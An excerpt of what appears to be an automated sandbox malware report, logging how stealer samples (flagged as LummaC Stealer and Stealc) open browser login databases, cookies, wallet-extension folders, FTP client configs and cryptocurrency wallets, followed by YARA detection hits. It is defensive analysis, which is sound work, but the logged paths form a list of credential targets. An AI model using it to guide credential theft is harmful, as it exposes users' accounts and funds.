Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqlite
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.db
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Roaming\FTPInfo
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Roaming\FTPbox
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Roaming\FTPRush
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Roaming\FTPGetter
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\ProgramData\SiteDesigner\3D-FTP
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Binance Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Roaming\Binance Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Searches for user specific document files
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\EFOYFBOLXA Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\SUAVTZKNFL Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\NEBFQQYWPS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\PWCCAWLGRE Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\SUAVTZKNFL Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\PWCCAWLGRE Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\SUAVTZKNFL Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\NEBFQQYWPS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\EFOYFBOLXA Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\LSBIHQFDVT Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\NEBFQQYWPS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\PWCCAWLGRE Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\SUAVTZKNFL Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\EFOYFBOLXA Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\NEBFQQYWPS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\EFOYFBOLXA Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\NEBFQQYWPS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\SUAVTZKNFL Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\EFOYFBOLXA Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\LSBIHQFDVT Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\PWCCAWLGRE Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\PWCCAWLGRE Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\SUAVTZKNFL Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\SUAVTZKNFL Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\PWCCAWLGRE Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\EFOYFBOLXA
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\LSBIHQFDVT
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\PWCCAWLGRE
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\SUAVTZKNFL
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\LSBIHQFDVT
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\NEBFQQYWPS
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\PWCCAWLGRE
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\SUAVTZKNFL
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\EFOYFBOLXA
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\NEBFQQYWPS
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\PWCCAWLGRE
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\SUAVTZKNFL
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\EFOYFBOLXA
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\LSBIHQFDVT
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\NEBFQQYWPS
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\PWCCAWLGRE
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\EFOYFBOLXA
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\EFOYFBOLXA
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\LSBIHQFDVT
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\NEBFQQYWPS
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\NEBFQQYWPS
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\PWCCAWLGRE
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\SUAVTZKNFL
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\EFOYFBOLXA
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\LSBIHQFDVT
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\NEBFQQYWPS
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\NEBFQQYWPS
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\PWCCAWLGRE
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\SUAVTZKNFL
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\EFOYFBOLXA
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\LSBIHQFDVT
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\NEBFQQYWPS
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\EFOYFBOLXA
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\LSBIHQFDVT
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\NEBFQQYWPS
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\PWCCAWLGRE
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: number of queries: 1474
Yara detected Credential Stealer
Source: Yara match File source: 0000000C.00000003.2836024588.0000000001A56000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.2871436723.0000000001A58000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.2798194667.0000000001A5B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2209806548.0000000000A76000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.2895609812.0000000001A6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.2839354396.0000000001A59000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.2895550351.0000000001A5B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.2797107426.0000000001A6A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.2822426933.0000000001A56000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.2797251445.0000000001A5B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.2797026872.0000000001A58000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 6532, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: efe6fe4127.exe PID: 4916, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: efe6fe4127.exe PID: 5280, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Credential Flusher
Source: Yara match File source: 00000022.00000003.2989652207.000000000114F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: deecb7b612.exe PID: 5856, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: deecb7b612.exe PID: 6976, type: MEMORYSTR
Yara detected LummaC Stealer
Source: Yara match File source: Process Memory Space: file.exe PID: 6532, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: efe6fe4127.exe PID: 4916, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: efe6fe4127.exe PID: 5280, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Yara detected Stealc
Source: Yara match File source: 31.2.num.exe.2a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 48.2.num.exe.2a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 48.0.num.exe.2a0000.0.unpack, type: UNPACKEDPE
